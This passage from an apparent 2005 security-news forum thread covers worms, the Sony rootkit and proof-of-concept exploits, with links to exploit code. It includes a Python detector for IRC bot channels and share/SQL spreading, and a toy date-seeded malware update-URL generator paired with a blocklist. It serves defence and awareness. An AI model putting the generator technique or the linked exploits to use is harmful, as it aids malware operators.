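            alerts.append((entry["src"], "outbound IRC (tcp/%d) to %s: possible bot command channel"
                           % (entry["dport"], entry["dst"])))
        if src_internal and dst_internal and entry["dport"] in SPREAD_PORTS:
            per_src[entry["src"]].append((entry["ts"], entry["dst"], entry["dport"]))
    for src, events in per_src.items():
        events.sort()
        best_targets, best_services, start = set(), set(), 0
        # sliding window over time-ordered events: largest set of distinct hosts within WINDOW
        for end in range(len(events)):
            while events[end][0] - events[start][0] > WINDOW:
                start += 1
            window = events[start:end + 1]
            targets = {dst for _, dst, _ in window}
            if len(targets) > len(best_targets):
                best_targets = targets
                best_services = {SPREAD_PORTS[p] for _, _, p in window}
        if len(best_targets) >= FANOUT_THRESHOLD:
            alerts.append((src, "touched %d distinct hosts on %s within %s: share/SQL spreading"
                           % (len(best_targets), ", ".join(sorted(best_services)), WINDOW)))
    return alerts

# Constructed sample records (not real traffic): one infected host, then two benign lines.
SAMPLE_CONNS = [
    "2005-11-16T12:45:01 10.0.1.20 -> 203.0.113.5:6667 tcp",
    "2005-11-16T12:45:05 10.0.1.20 -> 10.0.1.50:445 tcp",
    "2005-11-16T12:45:06 10.0.1.20 -> 10.0.1.51:445 tcp",
    "2005-11-16T12:45:07 10.0.1.20 -> 10.0.1.52:445 tcp",
    "2005-11-16T12:45:08 10.0.1.20 -> 10.0.1.53:445 tcp",
    "2005-11-16T12:45:09 10.0.1.20 -> 10.0.1.54:445 tcp",
    "2005-11-16T12:45:10 10.0.1.20 -> 10.0.1.55:445 tcp",
    "2005-11-16T12:45:30 10.0.1.20 -> 10.0.1.56:1433 tcp",
    "2005-11-16T12:46:00 10.0.2.3 -> 10.0.2.10:445 tcp",
    "2005-11-16T12:46:30 10.0.2.3 -> 198.51.100.4:443 tcp",
]

if __name__ == "__main__":
    for src, reason in detect(SAMPLE_CONNS):
        print(src, reason)
```

The fan-out rule is the more durable of the two: a bot herder can move the IRC server to any port, but a worm that guesses share and SQL passwords still has to open a session to every host it tries.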
-
November 17, 2005 at 4:45 am #3131494
Microsoft – New unpatched RPC memory allocation vulnerability
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
This new risk is rated as “Moderately Critical” and it can impact system performance. So far there are no published exploits in-the-wild on this newly discovered vulnerability that Microsoft will most likely patch soon.
Microsoft – New unpatched RPC memory allocation vulnerability
http://www.frsirt.com/english/advisories/2005/2468
Microsoft RPC memory allocation POC Exploit
note – actual POC code is published here – please be careful
http://www.frsirt.com/exploits/20051117.Win_upnp_getdevicelist.c.php
Microsoft Security Advisory (911052)
http://www.microsoft.com/technet/security/advisory/911052.mspx
Technical Description: A vulnerability has been identified in Microsoft Windows, which could be exploited by remote attackers to cause a denial of service. This flaw is due to a memory allocation error when processing specially crafted RPC (Remote procedure call) requests, which could be exploited by attackers to crash a vulnerable system or cause the “services.exe” process to consume a large amount of system resources.
Affected Products
Microsoft Windows 2000 Service Pack 4
Microsoft Windows 2000 Service Pack 3
Microsoft Windows 2000 Service Pack 2
Microsoft Windows 2000 Service Pack 1
Microsoft Windows 2000
Microsoft Windows XP Service Pack 1 (for Windows XP Service Pack 1 an attacker must have valid logon credentials to exploit this vulnerability).
Solution: FrSIRT is not aware of any official supplied patch for this issue.
Status: Microsoft is not aware of active attacks that use this vulnerability or of customer impact at this time.
-
November 18, 2005 at 9:24 am #3131079
Macromedia Flash Player vulnerability in older versions – POC Exploit published
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Macromedia has performed a security update for its Flash Player to improve security, including a critical vulnerability that can be exploited by visiting a malicious web page or opening a specially crafted email attachment. Everyone using this software should update as quickly as possible.
Advisory ID : FrSIRT/ADV-2005-2317
CVE ID : CVE-2005-2628
Rated as : Critical
Note : This proof-of-concept exploit generates a flash file that will cause a DoS
More Information and update links can be found in this blog entry
-
November 19, 2005 at 5:24 am #3117442
Sony BMG Rootkit – Complete list of 52 albums being recalled
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
One of my friends in the security field shared an excellent summary of the failed attempt by Sony BMG to better protect their music from Copyright violations. As an ethical individual, I respect the intellectual property rights of those in the music industry. The approach Sony used created harm and potential security issues for innocent loyal customers, who purchased their CDs in good faith.
The rootkit may have appeared to be a good technical solution on the drawing board for better protecting digital rights. However, they didn’t exercise risk management and plan well for things that could go wrong, including opening up the customer’s PC to emerging security risks based on new malware that takes advantage of the rootkit architecture.
The following provides an update for this issue with several related links:
QUOTE: Sony/BMG has just recalled 52 music CDs, all of which came with software which will install “rootkit” spyware programs on your Windows computer. If you have any of these CDs and have played them on your Windows PCs, your computers may be infected with some truly nasty software. This problem does NOT affect Macs or Linux computers and may not have affected you if you run a secure Windows setup. More than 500,000 computers are known to be infected worldwide.
List of 52 infected Sony CDs being recalled
http://cp.sonybmg.com/xcp/english/titles.html
More on Sony’s recall notice to replace these CDs at no charge to the owner
The Sony/BMG website has an uninstall program that is supposed to clean up the infection. HOWEVER, as of today, their uninstall program leaves your computer MORE VULNERABLE than before! Check with your anti-virus vendor to see if your AV can clean up this problem.
Microsoft is upgrading their Malicious Software Removal Tool, which is updated once a month. It will soon be updated to remove the XCP modifications that Sony/BMG put on your computer, but it’s not available currently. More information can be found at these sites:
Sony BMG’s copy-protection problems grow
http://securityfocus.com/news/11357
Mark’s Sysinternals Blog Victory!
http://www.sysinternals.com/blog/2005/11/victory.html
Sony’s DRM Rootkit: The Real Story
http://www.schneier.com/blog/archives/2005/11/sonys_drm_rootk.html
Secunia Advisory
http://secunia.com/advisories/17408/
US CERT Advisory
http://www.us-cert.gov/current/current_activity.html#xcpdrm
http://www.kb.cert.org/vuls/id/312073
Security issues may surface using Sony’s XCP uninstall tools
http://secunia.com/advisories/17610/
http://www.frsirt.com/english/advisories/2005/2454
http://www.freedom-to-tinker.com/?p=927
Security issues may surface using Sony’s uninstall for SunnComm MediaMax (another DRM)
http://secunia.com/advisories/17639/
http://www.frsirt.com/english/advisories/2005/2493
http://www.freedom-to-tinker.com/?p=931
Rootkits could mean a complete rebuild for your PC
http://insight.zdnet.co.uk/0,39020415,39237277-4,00.htm
QUOTE: How do we remove rootkits? — There is only one guaranteed way to remove a rootkit. You destroy the system and then rebuild it. There is no other way to reliably remove a rootkit — no other way whatsoever. You can’t delete the file or even reinstall the operating system over the top of the existing OS — which is a horrible practice anyway. It is super important to nuke the system because a rootkit’s primary function is stealth — what is it hiding? Do you know? Usually not. How can you reliably know what it was hiding, what it was compromising or what it was removing?
-
November 19, 2005 at 9:23 am #3117403
Sony BMG Rootkit – Key Information & List of 52 dangerous CDs being recalled
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
One of my friends in the security field shared an excellent summary of the failed attempt by Sony BMG to better protect their music from Copyright violations. As an ethical individual, I respect the intellectual property rights of those in the music industry. The approach Sony used created harm and potential security issues for innocent loyal customers, who purchased their CDs in good faith.
The rootkit may have appeared to be a good technical solution on the drawing board for better protecting digital rights. However, they didn’t exercise risk management and plan well for things that could go wrong, including opening up the customer’s PC to emerging security risks based on new malware that takes advantage of the rootkit architecture.
The following provides an update for this issue with several related links:
QUOTE: Sony/BMG has just recalled 52 music CDs, all of which came with software which will install “rootkit” spyware programs on your Windows computer. If you have any of these CDs and have played them on your Windows PCs, your computers may be infected with some truly nasty software. This problem does NOT affect Macs or Linux computers and may not have affected you if you run a secure Windows setup. More than 500,000 computers are known to be infected worldwide.
List of 52 infected Sony CDs being recalled
http://cp.sonybmg.com/xcp/english/titles.html
More on Sony’s recall notice to replace these CDs at no charge to the owner
The Sony/BMG website has an uninstall program that is supposed to clean up the infection. HOWEVER, as of today, their uninstall program leaves your computer MORE VULNERABLE than before! Check with your anti-virus vendor to see if your AV can clean up this problem.
Microsoft is upgrading their Malicious Software Removal Tool, which is updated once a month. It will soon be updated to remove the XCP modifications that Sony/BMG put on your computer, but it’s not available currently. More information can be found at these sites:
Sony BMG’s copy-protection problems grow
http://securityfocus.com/news/11357
Mark’s Sysinternals Blog Victory!
http://www.sysinternals.com/blog/2005/11/victory.html
Sony’s DRM Rootkit: The Real Story
http://www.schneier.com/blog/archives/2005/11/sonys_drm_rootk.html
Secunia Advisory
http://secunia.com/advisories/17408/
US CERT Advisory
http://www.us-cert.gov/current/current_activity.html#xcpdrm
http://www.kb.cert.org/vuls/id/312073
Security issues may surface using Sony’s XCP uninstall tools
http://secunia.com/advisories/17610/
http://www.frsirt.com/english/advisories/2005/2454
http://www.freedom-to-tinker.com/?p=927
Security issues may surface using Sony’s uninstall for SunnComm MediaMax (another DRM)
http://secunia.com/advisories/17639/
http://www.frsirt.com/english/advisories/2005/2493
http://www.freedom-to-tinker.com/?p=931
Rootkits could mean a complete rebuild for your PC
http://insight.zdnet.co.uk/0,39020415,39237277-4,00.htm
QUOTE: How do we remove rootkits? — There is only one guaranteed way to remove a rootkit. You destroy the system and then rebuild it. There is no other way to reliably remove a rootkit — no other way whatsoever. You can’t delete the file or even reinstall the operating system over the top of the existing OS — which is a horrible practice anyway. It is super important to nuke the system because a rootkit’s primary function is stealth — what is it hiding? Do you know? Usually not. How can you reliably know what it was hiding, what it was compromising or what it was removing?
Key Advice for now: Please do not play CDs using your PC until this issue is fully addressed (or if you do play CDs not on the list, still be vigilant and cautious). It could require rebuilding your PC.
Ideas for Infected Users: If you are currently infected with the XCP software, some standalone tools and removers are available. Do not try to remove this manually unless you have complete directions and you are highly skilled as a computer technician. Your CD-ROM or PC may no longer work properly if you fail to remove the rootkit properly. I believe further “help is on the way” and infected users might be better served to wait a little while longer until better tools are published.
-
November 20, 2005 at 9:23 am #3117307
Articles: Windows Rootkits in 2005 – Part I and II
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Both articles were published by Security Focus and they provide excellent technical information on how this emerging threat works in detail.
Windows Rootkits in 2005 – Part I
http://www.securityfocus.com/infocus/1850
Windows Rootkits in 2005 – Part II
http://online.securityfocus.com/infocus/1851
-
November 21, 2005 at 9:23 am #3122378
Internet Explorer – New Proof-of-Concept “zero day” Exploit published
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
A new proof-of-concept (POC) exploit has been published for a critical unpatched IE vulnerability. Please be careful of any websites you visit; so far there are no reports of the POC being found in the wild.
New Zero Day Internet Explorer Remote Code Execution Exploit
http://www.frsirt.com/english/advisories/2005/2509
http://www.frsirt.com/exploits/20051121.IEWindow0day.php
http://secunia.com/advisories/15546/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1790
QUOTE: A critical vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by remote attackers to execute arbitrary commands. This flaw is due to a memory corruption error when processing malformed HTML pages containing specially crafted calls to the JavaScript “window()” object and the “body onload” tag, which could be exploited by remote attackers to take complete control of an affected system by convincing a user to visit a malicious Web page.
This vulnerability has been confirmed on Windows XP SP2 with Internet Explorer 6 (fully patched).
-
November 21, 2005 at 5:31 pm #3122212
Internet Storm Center moves to Yellow Alert Status on zero day IE exploit
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Internet Storm Center moves to Code Yellow Status on Zero Day IE exploit
Prevention techniques include: using IE for trusted sites, using alternative browsers, and in IE to disable Active Scripting except for trusted sites (Secunia link).
-
November 22, 2005 at 5:35 am #3123756
Microsoft Security Advisory (911302) – Information and workarounds for new IE vulnerability
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Microsoft is addressing this new security exposure which has recently emerged as a new zero day proof-of-concept exploit. They offer workarounds and technical information on the exposures in the link below:
Microsoft Security Advisory (911302) – New IE vulnerability with temporary Workarounds
QUOTE: This issue was originally publicly reported in May as being a stability issue that caused the browser to close. Since then, new information has been posted that indicates remote code execution could be possible. Microsoft is concerned that this new report of a vulnerability in Internet Explorer was not disclosed responsibly, potentially putting computer users at risk. We continue to encourage responsible disclosure of vulnerabilities. We believe the commonly accepted practice of reporting vulnerabilities directly to a vendor serves everyone’s best interests. This practice helps to ensure that customers receive comprehensive, high-quality updates for security vulnerabilities without exposure to malicious attackers while the update is being developed.
More information and links can be found for a new zero day proof-of-concept exploit that has been published by selecting this link:
Internet Storm Center moves to Yellow Alert Status on zero day IE exploit
-
November 23, 2005 at 5:14 am #3121629
Sober.Y – Message Labs stops 2.7 million copies
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
The link below shares a press release of the Sober.Y which continues to generate large quantities of infected email messages. I personally got 00’s of copies and they are still streaming in. Please be careful with all suspicious emails and never open attachments unless you are absolutely certain they are safe.
MessageLabs Stops Over 2.7 million Copies of New Sober Virus That Spoofs FBI and CIA
November 22, 2005 – 17:00 GMT/ 12:00 ET – MessageLabs has intercepted over 2.7-million copies of a new Sober virus, many of which are being spoofed to appear as though they are sent from the FBI or the CIA. The first copy was stopped at 19:00 GMT on 21st November. The size of the attack indicates that this is a major offensive, certainly one of the largest in the last few months.
Email Overview
These emails suggest to recipients that their Internet use has been monitored by the FBI or CIA and that they have accessed illegal Web sites. The email directs users to open the ZIP attachment containing the executable, which once opened delivers the Sober virus payload. It then spreads by searching the infected computer for other email addresses to send copies of itself to, but ignoring any domains for certain security organizations, including MessageLabs.
-
November 23, 2005 at 9:14 am #3114083
Opera 8.51 released to address critical security exposures
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Opera 8.51 has been released to address critical security issues. I use this as a complementary browser in addition to IE 6 (XP SP2) and the Mozilla Deerpark beta (Firefox 1.5 RC3). After a couple of days of testing, this new version is working well on my work and home PCs. All Opera users should move to the latest version to ensure they enjoy the best protection possible.
Opera 8.51 for Windows is available for download.
Changes since 8.50
User interface
Added Answers.com search option, with ‘a’ as keyword to search from address field. The version number of search.ini has not been increased; the change will only be visible in fresh installs.
Security and plug-ins
- Macromedia Flash version shipped with Opera is now 7r61. Addresses issue reported in Secunia Advisory 17437.
- Solved severe stability issue when using the Acrobat Reader 7.0.5 plug-in.
Miscellaneous
- Fixed multiple stability issues.
FrSIRT Critical Advisory Information – Key Security Changes
http://www.frsirt.com/english/advisories/2005/2519
Multiple vulnerabilities were identified in Opera, which could be exploited by attackers to execute arbitrary commands.
The first issue is due to a memory corruption error in Macromedia Flash Player, a third party application redistributed with Opera, which could be exploited by remote attackers to compromise a vulnerable system by convincing a user to visit a specially crafted Web page or open a malicious Flash file. For additional information, see: FrSIRT/ADV-2005-2317
The second vulnerability is due to an error where the shell script used in Unix / Linux based environments to launch Opera parses shell commands enclosed within backticks in the URL provided via the command line, which could be exploited by remote attackers to compromise a vulnerable system by convincing a user to follow a malicious link in an external program (e.g. Thunderbird or Evolution). This issue is similar to FrSIRT/ADV-2005-1794.
-
November 23, 2005 at 1:15 pm #3113997
Bagle/Beagle – Several pre-Thanksgiving variants
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
F-Secure and McAfee report several new variants and this list could grow. Batten down the hatches.
F-Secure – 6 new variants
http://www.f-secure.com/v-descs/bagle_eo.shtml
http://www.f-secure.com/v-descs/bagle_ep.shtml
http://www.f-secure.com/v-descs/bagle_eq.shtml
http://www.f-secure.com/v-descs/bagle_er.shtml
http://www.f-secure.com/v-descs/bagle_es.shtml
http://www.f-secure.com/v-descs/bagle_et.shtml
McAfee detection information
http://vil.nai.com/vil/content/v_137087.htm
Quote: Several new W32/Bagle downloader variants have been widely spammed to users (November 23, 2005). To date, they are detected as W32/Bagle.gen@MM with the 4635 DATs.
These are downloader trojans. However, like previous Bagle variants, it is likely that in the near future, the author(s) will post an accompanying EXE file on a remote server, which SPAMs new versions of Bagle (not to addresses harvested on the local system, but to addresses specified in spam lists also on remote web servers). This trojan was mass-spammed in a ZIP attachment and uses peoples names as the filenames, for example:
* Edmund.zip
* Elizabeth.zip
* Fraunces.zip
* Grace.zip
* Henrie.zip
* Jeames.zip
-
November 24, 2005 at 9:14 am #3113817
Rootkits – Good Article defining what a rootkit is
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
CHARACTERISTICS OF A ROOTKIT:
1. A rootkit substitutes malicious code in place of legitimate Operating System routines. It does so in a highly stealth-like manner by turning off certain security routines.
2. They are difficult to detect. Anti-virus (AV) software must be programmed in a special complex way to even detect this software. AV products can’t interrogate protected operating system files as well as they can other files.
3. Rootkits are difficult to clean as they integrate deeply within the Registry and system files. Unless you have a proven rootkit cleaning tool, you should rebuild the PC completely from the ground up, so that there are assurances that all rootkit components are gone.
Quote: The Sony BMG copy protection debacle has pulled “rootkit” out of the hacker underground and into the wider world of regular computer users. But while those PC owners may now recognize the term, that doesn’t necessarily mean they know what kind of threat it describes. And in the Sony case, not even the experts can agree on whether the record label’s antipiracy technology meets the technical definition of a rootkit.
CNET Article: What makes a rootkit?
-
November 24, 2005 at 9:15 am #3113816
Sober.X Worm – Special FBI Warning
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
QUOTE: Washington, D.C. – The FBI is warning the public to avoid falling victim to an on-going mass e-mail scheme wherein computer users received unsolicited e-mails purportedly sent by the FBI. These scam e-mails tell the recipients that their Internet use has been monitored by the FBI and that they have accessed illegal web sites. The e-mails then direct recipients to open an attachment and answer questions.
-
November 25, 2005 at 9:14 am #3122678
SANS – Twenty Most Critical Internet Security Vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
-
November 25, 2005 at 9:14 am #3122679
Mytob.MX – New variant rated Medium by Trend
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
This new mass-mailing worm combines Mydoom functionality with Sdbot functionality. It can launch an IRC bot and install a downloader component that may install other malware from hostile web sites.
McAfee – Mytob.HE (DAT 4636 provides protection)
F-Secure – MyTob.DO Information
Trend – Mytob.MX information – rated as MEDIUM RISK
Trend – Mytob.MX behavioral chart (excellent analysis)
Trend – Mytob.MX example of email
EMAIL TO BLOCK OR AVOID
Subject: (avoid all of the following)
Your Account is Suspended
*DETECTED* Online User Violation
Your Account is Suspended For Security Reasons
Warning Message: Your services near to be closed.
Important Notification Members Support
Security measures
Email Account Suspension
Notice of account limitation
Attachment: (avoid all of the following)
• {Random file name}.zip
• account-details.zip
• account-info.zip
• account-password.zip
• account-report.zip
• approved-password.zip
• document.zip
• email-details.zip
• email-password.zip
• important-details.zip
• new-password.zip
• password.zip
• updated-password.zip
-
November 26, 2005 at 9:15 am #3044016
FortiNet Security Site – Good Statistics on viruses & spyware
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
During early morning research, I discovered a good security site. It provides one day, one week, and one month Top 10 virus statistical counts. Below are some key resources and the 1st link is a good one to bookmark for monitoring current Internet activities:
FortiNet Security Site – Good Statistics on viruses & spyware
Top Ten viruses
http://www.fortinet.com/FortiGuardCenter/global_threat_stats.html
Current Major Viruses & Spyware Overview
http://www.fortinet.com/FortiGuardCenter/av.html
Current Major Vulnerabilities
http://www.fortinet.com/FortiGuardCenter/idp.html
Web URL Lookup and testing facility
http://www.fortinet.com/FortiGuardCenter/webfiltering.html
In addition to forums and blogs, below is a partial list of some free resources to monitor current developments:
Microsoft sites (Security, Technet, At Home, MSRC, Live)
http://www.microsoft.com/security/default.mspx
http://www.microsoft.com/technet/security/default.mspx
http://www.microsoft.com/athome/security/community/default.mspx
http://blogs.technet.com/msrc/
http://safety.live.com/
AVERT – McAfee Security and AV developments
http://myavert.avertlabs.com/myavert/default.aspx
Secunia – New virus and security advisories
http://secunia.com/virus_information/
Internet Storm Center – Major security advisories
http://isc.sans.org/
FrSIRT – New Security Vulnerabilities & Exploits
http://www.frsirt.com/english/
CERT – Major security advisories
http://www.us-cert.gov/current/current_activity.html
Virus Total – Top 10 realtime & great testing site
http://www.virustotal.com/flash/index_en.html
F-Secure – Top 10 & WebLog
http://www.f-secure.com/virus-info/statistics/
http://www.f-secure.com/weblog/
Kaspersky Weblog
http://www.viruslist.com/en/weblog
InfoSys Security
http://www.infosyssec.net/
and finally, I wonder who created this great site?
-
November 27, 2005 at 5:15 pm #3043837
MS05-051 –POC Exploit published for critical DTC vulnerability
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
This proof-of-concept DTC exploit appears to be reverse engineered from the October updates. As this critical vulnerability impacts communications security, it could be potentially crafted into a new Internet worm, based on some reports I’ve read. Please be sure you are up-to-date on all Microsoft Windows updates (esp. through October 2005).
Microsoft Windows Distributed Transaction Coordinator Remote Exploit (MS05-051)
Please be careful as this link contains actual exploit code below:
http://www.frsirt.com/exploits/20051127.55k7-msdtc.c.php
-
December 15, 2005 at 7:28 pm #3125849
Sony SunnComm vulnerability – Avoid playing these 27 CDs in your PC
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
The danger is associated with copy-protection software included on some Sony discs created by a company called SunnComm Technologies. The vulnerability could allow malicious programmers to gain control of computers that have run the software, which is typically installed automatically when a disc is put in a computer’s CD drive.
Sony lists 27 CDs with SunnComm MediaMax vulnerability
27 CDs containing SunnComm MediaMax Version 5 Content Protection Software
-
December 15, 2005 at 7:28 pm #3125846
Oracle 9i Database XDB HTTP Authentication Remote Stack Overflow Exploit
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
A new critical proof-of-concept exploit has been published for Oracle 9 web based apps.
Oracle 9i Database XDB HTTP Authentication Remote Stack Overflow Exploit
http://www.frsirt.com/exploits/20051208.oracle9i_xdb_http.pm.php
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727
http://isc.sans.org/
-
December 15, 2005 at 7:28 pm #3125847
New JS_Downloader viruses exploit unpatched 911302 IE vulnerability
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Trend notes at least three new Java Script based viruses have emerged which exploit the unpatched 911302 IE vulnerability. Please be careful using Internet Explorer and visit only websites you trust.
This JavaScript malware may be opened using Internet Explorer (IE) while a user visits different Web sites. It uses a known vulnerability in IE, which results in the download and execution of files without the knowledge of the user.
More information: Microsoft Security Advisory (911302)
-
December 15, 2005 at 7:28 pm #3125848
Sober.X (CME-681) – New malware updates scheduled Jan 5, 2006
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Personally, I’m still receiving lots of copies of Sober.x on a daily basis in my personal email accounts. On an infected PC, Sober.X creates a backdoor that allows it to autoupdate. Both F-Secure and CERT have issued warnings for new malware updates that will be automatically scheduled on January 6, 2006.
Secunia – Sober.X (CME-681) Anti-Virus links
http://secunia.com/virus_information/23836/sober.x/
F-Secure details how the URL calculation process works
http://www.f-secure.com/weblog/archives/archive-122005.html#00000729
QUOTE: Sober.Y was the biggest email outbreak of the year. It still is responsible for around 40% of all the infections we see. This variant is programmed to activate on January 5th, 2006. After this date all the infected machines will regularly try to download and run a file from a website, forever.
So, what URL is the virus using? This is the tricky part. The virus writer knows well that if he uses a single, constant address in the virus body, it will get blocked quickly. So instead, Sober has been using an algorithm to create pseudorandom URLs which will change based on date. These URLs point to free hosting servers typically operating in Germany or in Austria. And 99% of the URLs generated by the virus simply don’t exist.
However, the virus author can precalculate the URL for any date, and when he wants to run something on all the infected machines, he just registers the right URL, uploads his program and BANG! It’s run globally in hundreds of thousands of machines.
Special CERT warning
http://www.us-cert.gov/current/current_activity.html#soberx
QUOTE: US-CERT is aware of functionality that could allow the mass-mailing worm known as “W32/Sober.X” to automatically update itself. W32/Sober.X is a bi-lingual (English and German) mass-mailing worm that utilizes its own SMTP engine to propagate. The W32/Sober.X worm began propagating on November 15, 2005 and will attempt to update itself on or around January 5, 2006.
US-CERT strongly recommends that users and administrators implement the following general protection measures:
* Install anti-virus software, and keep its virus signature files up-to-date
* Do not follow unsolicited web links or execute attachments received in email messages, even if sent by a known and trusted source
* Keep up-to-date on patches and fixes for your operating system
-
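The date-driven URL scheme F-Secure describes above, as an added example that is not part of the original post and not Sober's actual code: a toy date-seeded generator (the hash mixing, host names, path and per-day count are assumptions) next to the defender-side precomputation that turns the same predictability into a proxy blocklist ready before the activation date.

```python
"""Toy date-seeded update URL generator and a defender-side precomputed blocklist.

Constructed illustration: the seed mixing, host names and path below are
assumptions chosen to show the principle F-Secure describes, NOT Sober.X's
real algorithm. The point is that a date-driven generator is deterministic,
so whoever has the algorithm (author or defender) can compute every future
URL ahead of time.
"""
from __future__ import annotations

import hashlib
from datetime import date, timedelta

# Assumed free-hosting domains; placeholders, not hosts used by the real worm.
FREE_HOSTS = ("free-host-a.example", "free-host-b.example", "free-host-c.example")
URLS_PER_DAY = 4                      # assumed: candidates the toy generator tries per day
GENERATOR_KEY = b"constructed-key"    # assumed constant baked into the toy generator


def _mix(*parts: bytes) -> int:
    """Deterministic 64-bit value derived from the inputs (stand-in for the worm's own PRNG)."""
    return int.from_bytes(hashlib.sha256(b"".join(parts)).digest()[:8], "big")


def candidate_urls(day_iso: str) -> list[str]:
    """URLs the toy generator would poll on the given day (ISO date string)."""
    day = date.fromisoformat(day_iso)
    urls = []
    for i in range(URLS_PER_DAY):
        n = _mix(GENERATOR_KEY, day.isoformat().encode(), bytes([i]))
        host = FREE_HOSTS[n % len(FREE_HOSTS)]
        # 24-bit subdomain label: almost none of these will ever be registered,
        # matching the "99% of the URLs simply don't exist" observation.
        label = f"u{(n >> 8) & 0xFFFFFF:06x}"
        urls.append(f"http://{label}.{host}/update.bin")
    return urls


def precompute_blocklist(start_iso: str, days: int) -> dict[str, str]:
    """Map every URL the generator will use from start_iso for `days` days to its date.

    This is the defender's side of the same predictability: compute the list
    once and load it into a proxy or DNS sinkhole before the activation date.
    """
    start = date.fromisoformat(start_iso)
    table: dict[str, str] = {}
    for offset in range(days):
        day = start + timedelta(days=offset)
        for url in candidate_urls(day.isoformat()):
            table[url] = day.isoformat()
    return table


def classify_request(url: str, blocklist: dict[str, str]) -> str:
    """Proxy-side decision for one outbound request: 'blocked-dga' or 'allow'."""
    return "blocked-dga" if url in blocklist else "allow"


if __name__ == "__main__":
    activation = "2006-01-05"   # activation date given in the F-Secure and US-CERT quotes
    table = precompute_blocklist(activation, 30)
    print(f"{len(table)} URLs precomputed for 30 days from {activation}")
    for url in candidate_urls(activation):
        print(classify_request(url, table), url)
```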
December 15, 2005 at 7:28 pm #3125843
New Firefox Exploit affects versions earlier than 1.05
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Yesterday, a brand new exploit affecting OLDER versions of Firefox was published. It is important to stay up-to-date on the latest product versions, as security updates are often a critical component of each version update.
Mozilla Firefox “InstallVersion.compareTo” Remote Buffer Overflow Exploit
Please be careful at this site as actual exploit code resides here
http://www.frsirt.com/exploits/20051212.fireburn.php
Original Advisory from July 2005
http://www.frsirt.com/english/advisories/2005/1075
Remotely Exploitable : Yes
Locally Exploitable : Yes
Affected Products: Mozilla Firefox 1.0.4 and prior, Mozilla Suite 1.7.8 and prior, Thunderbird 1.0.2 and prior
Solution: Upgrade to Mozilla Firefox 1.5 or later versions of the Mozilla Suite and Thunderbird
-
December 15, 2005 at 7:28 pm #3125844
Microsoft Security Updates – December 2005
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Security patches have been issued for both Windows and Internet Explorer. This update went well on my home PC with no issues and I recommend updating all workstations as soon as possible.
Windows Update Link
http://www.microsoft.com/windowsupdate/
Microsoft Security Bulletin MS05-054
Cumulative Security Update for Internet Explorer (905915)
http://www.microsoft.com/technet/security/Bulletin/ms05-054.mspx
Impact of Vulnerability: Remote Code Execution
Maximum Severity Rating: Critical
Security Update Replacement: This update replaces the update that is included with Microsoft Security Bulletin MS05-052. That update is also a cumulative update.
Addresses four Vulnerabilities in Internet Explorer:
1. File Download Dialog Box Manipulation Vulnerability (CAN-2005-2829)
2. HTTPS Proxy Vulnerability (CAN-2005-2830)
3. COM Object Instantiation Memory Corruption Vulnerability (CAN-2005-2831)
4. Mismatched Document Object Model Objects Memory Corruption Vulnerability (CAN-2005-1790)
Microsoft Security Bulletin MS05-055
Vulnerability in Windows Kernel Could Allow Elevation of Privilege (908523)
http://www.microsoft.com/technet/security/Bulletin/ms05-055.mspx
Impact of Vulnerability: Elevation of Privilege
Maximum Severity Rating: Important
Addresses the following Vulnerability in Windows: Windows Kernel Vulnerability – A privilege elevation vulnerability exists in the way that asynchronous procedure calls are processed within the kernel. This vulnerability could allow a logged on user to take complete control of the system (CAN-2005-2827).
-
December 15, 2005 at 7:28 pm #3125845
Kongo31.XRW — EMAIL with False McAfee download links
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Please delete all associated email claiming to offer update protection from Kongo31.XRW. McAfee does not send out email notices like this and you should continue to update through normal channels.
QUOTE: We’ve received several reports of emails, warning about a new virus called “Kongo31.XRW” (which doesn’t exist). The email links to a fake McAfee site, hosted in Canada: The download link gets you a file called ak26xrw-patch-installer-win32.exe – which (surprise, surprise!) is infected with Trojan-Downloader.Win32.Hanlo.h
Kongo31.XRW — False McAfee download links
http://www.f-secure.com/weblog/archives/archive-122005.html#00000733
Kongo31.XRW — email Example
http://www.f-secure.com/weblog/archives/mcafeecenter.gif
Kongo31.XRW — Special McAfee warning
http://vil.mcafeesecurity.com/vil/content/v_137511.htm
-
December 15, 2005 at 7:28 pm #3125841
Best Practices: Send Real Greeting Cards or Plain Text Messages
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Seasonal email attachments, HTML messages, Electronic Greeting Cards, and URL links can potentially contain spyware or viruses. It’s a popular approach and one idea offered by the Internet Storm Center is to send “plain text” messages to our family and friends. This approach communicates a good personal message and it also promotes security awareness. As a best practice, I’ve always advocated sending a real greetings card in lieu of e-cards.
